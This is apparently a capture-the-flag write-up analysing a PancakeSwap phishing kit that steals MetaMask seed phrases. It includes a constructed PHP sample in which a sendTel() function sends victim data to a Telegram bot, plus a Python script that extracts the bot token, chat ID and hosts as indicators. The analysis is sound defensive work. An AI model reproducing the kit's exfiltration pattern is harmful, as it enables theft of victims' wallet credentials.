GrabThePhisher - CyberDefenders
After we unzip the file, we get the following directories.
We can guess the phisher is trying to impersonate the PancakeSwap website.
We can already see a few interesting folders, such as metamask, src and log.
Let's check out the "metamask" folder, where we find an HTML file and a PHP file.
We can already see some important information in the .php file.
The "<?" tag is called the short open tag in PHP. To use short tags,
one has to enable them in the settings in the php.ini file.
The code suggests the phisher used sypexgeo.net/ to grab the target/victim machine info.
Further down, in the function sendTel(), we get a bunch of juicy information for tracking
the phisher, such as the ID, the TOKEN, and the messaging channel used for the credential dump.
The phishing kit developer also logs the entered data to a typical file, log.txt, which the
presence of a folder named log in the starting directory already hints at.
Checking the folder, we have 3 lines of 12-word seed phrases.
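The triage steps above (pulling the ID and TOKEN out of sendTel(), noting the external hosts, and counting the seed phrases in log.txt) can be automated. The following is an added example, not code from the kit or the script linked from this write-up; the PHP snippet, token, chat ID, log contents and the $id/$token variable names are constructed assumptions.

```python
import re

# Constructed stand-ins: not the kit's real source, token, chat ID or log contents.
FAKE_TOKEN = "1234567890:AA" + "FAKE" * 8 + "0"
SAMPLE_PHP = '''<?
$geo = file_get_contents("http://sypexgeo.net/" . $_SERVER['REMOTE_ADDR']);
function sendTel($message){
    $id = "1000000001";
    $token = "__TOKEN__";
    file_get_contents("https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$id);
}
'''.replace("__TOKEN__", FAKE_TOKEN)
SAMPLE_LOG = "\n".join(" ".join(f"word{i}" for i in range(12)) for _ in range(3))
SAMPLE_LOG += "\nnot a seed phrase\n"

# Telegram bot tokens look like "<numeric bot id>:<35 URL-safe characters>".
TOKEN_RE = re.compile(r"(?<!\d)\d{8,10}:[A-Za-z0-9_-]{35}(?![A-Za-z0-9_-])")
# Assumed variable names ($id, $token), following the ID and TOKEN the write-up mentions.
ASSIGN_RE = re.compile(r"""\$(id|token)\s*=\s*["']([^"']+)["']""", re.I)
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

def extract_iocs(php_source):
    """Collect the exfiltration channel and third-party hosts hard-coded in a kit."""
    assigned = {name.lower(): value for name, value in ASSIGN_RE.findall(php_source)}
    return {
        "chat_id": assigned.get("id"),
        "bot_token": assigned.get("token"),
        "token_shaped": TOKEN_RE.findall(php_source),  # catches renamed variables too
        "hosts": sorted(set(HOST_RE.findall(php_source))),
    }

def seed_phrase_lines(log_text, words=12):
    """Count log lines shaped like a seed phrase without echoing victim data."""
    return sum(1 for line in log_text.splitlines() if len(line.split()) == words)

def lookup_urls(iocs):
    """Bot API URLs an analyst could query for the bot and chat (built, not fetched).
    Assumption: the write-up does not show which calls its own script makes."""
    base = f"https://api.telegram.org/bot{iocs['bot_token']}"
    return [f"{base}/getMe", f"{base}/getChat?chat_id={iocs['chat_id']}"]

if __name__ == "__main__":
    iocs = extract_iocs(SAMPLE_PHP)
    print(iocs)
    print("seed-phrase lines:", seed_phrase_lines(SAMPLE_LOG))
    print(lookup_urls(iocs))
```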
To trace the phisher with the information in the kit code, we need to write a
simple script that retrieves detailed info about the phisher.
Get code here.
The result of the script looks something like this:
The end. :)